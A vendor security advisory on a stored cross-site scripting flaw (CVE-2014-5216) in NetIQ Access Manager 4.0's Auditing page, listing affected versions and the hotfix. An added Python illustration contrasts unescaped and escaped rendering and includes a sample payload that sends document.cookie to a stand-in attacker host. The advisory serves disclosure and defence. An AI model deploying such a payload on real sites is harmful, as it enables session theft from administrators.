Persistent cross-site scripting (XSS) attack used against the Admin Console to inject a stored script into the Auditing page - CVE-2014-5216

  • 7015996
  • 15-Dec-2014
  • 17-Dec-2014


NetIQ Access Manager 4.0
NetIQ Access Manager 4.0 Admin Console
NetIQ Access Manager 4.0 Support Pack 1 HF2 applied


The following URL, when sent to the Access Manager Admin Console server, uses persistent cross-site scripting (XSS) to inject a stored script into the Auditing page:


Once the request has been sent, opening the Auditing page in iManager executes the stored script in the browser of whoever views it.
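As an added illustration, and not code from NetIQ or from this TID, the Python below models the stored-XSS pattern the advisory describes: an attacker-controlled value is written to an audit store by one request and later rendered into the Auditing page without output encoding. The audit store, the two renderers and the sample payload are all constructed for the example; the hardened renderer shows the output-encoding fix, and the final check is the kind of regression test you can run against the rendered page after applying the hotfix.

```python
"""Model of the stored-XSS pattern in this TID (illustrative only; this is
not NetIQ Access Manager or iManager code)."""
import html
import re

# Constructed sample: what an attacker-controlled audit value could look like.
PAYLOAD = ('<script>document.location="http://attacker.example/?c="'
           '+document.cookie</script>')

# Constructed in-memory audit store standing in for the real audit log.
AUDIT_STORE = []


def record_audit_event(source, message):
    """Persist the event exactly as received: the sink that makes the XSS 'stored'."""
    AUDIT_STORE.append({"source": source, "message": message})


def render_auditing_page_vulnerable(events):
    """Unsafe: stored fields are concatenated straight into the HTML."""
    rows = "".join(
        f"<tr><td>{e['source']}</td><td>{e['message']}</td></tr>" for e in events
    )
    return f"<table>{rows}</table>"


def render_auditing_page_fixed(events):
    """Hardened: every untrusted field is HTML-escaped at output time, so the
    stored payload is displayed as text instead of being parsed as markup."""
    rows = "".join(
        f"<tr><td>{html.escape(e['source'], quote=True)}</td>"
        f"<td>{html.escape(e['message'], quote=True)}</td></tr>"
        for e in events
    )
    return f"<table>{rows}</table>"


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script(page_html):
    """True if the rendered page still carries an unescaped <script> tag.
    Run this over the fetched Auditing page after patching to confirm the
    payload no longer renders as executable markup."""
    return SCRIPT_TAG.search(page_html) is not None


def demo():
    """Store one benign and one malicious event, render both ways, report which
    rendering still contains a live script tag."""
    AUDIT_STORE.clear()
    record_audit_event("10.0.0.5", "login failed")           # constructed
    record_audit_event("10.0.0.9", PAYLOAD)                  # constructed
    return {
        "vulnerable": contains_live_script(render_auditing_page_vulnerable(AUDIT_STORE)),
        "fixed": contains_live_script(render_auditing_page_fixed(AUDIT_STORE)),
    }


if __name__ == "__main__":
    print(demo())  # {'vulnerable': True, 'fixed': False}
```

The fix belongs at the output side: the value reaches the store through an administrative request that is hard to filter reliably, so the Auditing page must encode every stored field when it renders, regardless of how the field got there.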


Apply Access Manager 4.0.1 HF3 or later to address the issue.

Additional Information

NetIQ thanks Wolfgang Ettlinger (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab for responsibly reporting the identified issues and working with us as we addressed them.